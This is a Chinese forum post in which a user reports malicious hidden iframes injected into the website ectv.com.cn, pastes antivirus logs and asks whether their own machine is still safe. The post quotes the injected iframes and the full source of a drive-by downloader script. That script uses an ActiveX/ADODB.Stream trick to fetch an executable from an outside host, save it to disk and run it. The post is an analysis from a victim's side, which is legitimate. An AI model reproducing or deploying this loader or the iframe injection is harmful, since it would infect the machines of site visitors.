========Title========
高手共同分析下这个带毒网站~www.ectv.com.cn
========Content========
www.ectv.com.cn
网页最后有以下嵌入
<iframe src='http://www.hyap98.com/123/ad.htm' height='0'></iframe><iframe src='http://www.hyap98.com/123/ad.htm' height='0'></iframe><iframe src=http://www.hyap98.com/123/ad.htm height=0></iframe><iframe src='http://www.jibaquan.com/vip/gm.htm' height='0'></iframe>
其中
http://www.jibaquan.com/vip/gm.htm
报的是Trojan.DL.Ieframe.ca    清除成功
又有三个指向
为：
<iframe src="vip1.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip2.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip.htm" width="50" height="0" border="0"></iframe>
vip,vio1杀毒软件均没有报错。
vip2里的内容直接给清除了。报的是
Trojan.DL.JS.Agent.lfs  清除成功
vip2.htm的源码：
document.writeln("<script>var vip,love;vip=\"http://www.jibaquan.com/vip/vip.exe\";love=\"c:\Microsoft.exe\";try{var ado=(document.createElement(\"object\"));var d=1;ado.setAttribute(\"classid\",\"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\");var chenzi=1;var fan=ado.CreateObject(\"Microsoft.xmlhttp\",\"\");var f=1;var admin=\"A\";var ln=\"do\";var lzn=\"db.St\";var an=\"ream\";var g=1;var china=ado.createobject(admin+ln+lzn+an,\"\");var h=1;fan.Open(\"GET\",vip,0);fan.Send();china.type=1;var n=1;china.open();china.write(fan.responseBody);china.savetofile(love,2);china.close();var chinahks=ado.createobject(\"ShelL.Application\",\"\");chinahks.ShelLexecute(love,\"\",\"\",\"open\",0);}catch(chenzi){};</script\>");



把瑞星的记录也贴出来。
Trojan.DL.Ieframe.ca 清除成功 文件监控F:\Temp\Internet 临时文件\Content.IE5\BEYG1BMD  ectv.com[1].htm                                                           
     
Hack.SuspiciousAni  删除成功 文件监控 F:\Temp\Internet 临时文件\Content.IE5\PF64L5CZ                ah[1].c                                                                                                               
Trojan.DL.JS.Agent.lfs 清除成功 文件监控 F:\Temp\Internet 临时文件\Content.IE5\HJHA24BS    vip2[1].htm                                                                                                           
Trojan.DL.JS.Agent.lfs 跳过脚本 网页/脚本监控C:\DOCUME~1\sul\LOCALS~1\Temp                  236052704936.tmp                                                                                                       
Trojan.DL.JS.Agent.lix 跳过脚本 网页/脚本监控C:\DOCUME~1\sul\LOCALS~1\Temp                  236052704936.tmp 

                                                                            ...........                       
 
Trojan.DL.Ieframe.ca清除成功 文件监控C:\DOCUME~1\sul\LOCALS~1\Temp\JetCar\www.ectv.com.cn    index.htm                                                                                                             
中间偶试着用flash get 的站点资源探索器下载带毒页面。但瑞星没有像浏览的时候那样报Trojan.DL.Ieframe.ca ，但其他的都报了。
另外http://www.jibaquan.com/vip/vip.exe在其网站也没找到。
http://www.jibaquan.com网站首页被篡改。
现在偶的机器运行还算正常，启动项基本没什么其他新东东。

因为涉及网上交易，所以请问高手系统是否安全。（另：全部扫面后提示无毒。）
附：补丁早已经安装，但是因为感兴趣就自个把带毒的页面全弄到硬盘里看了，所以些不放心。

打系统补丁吧.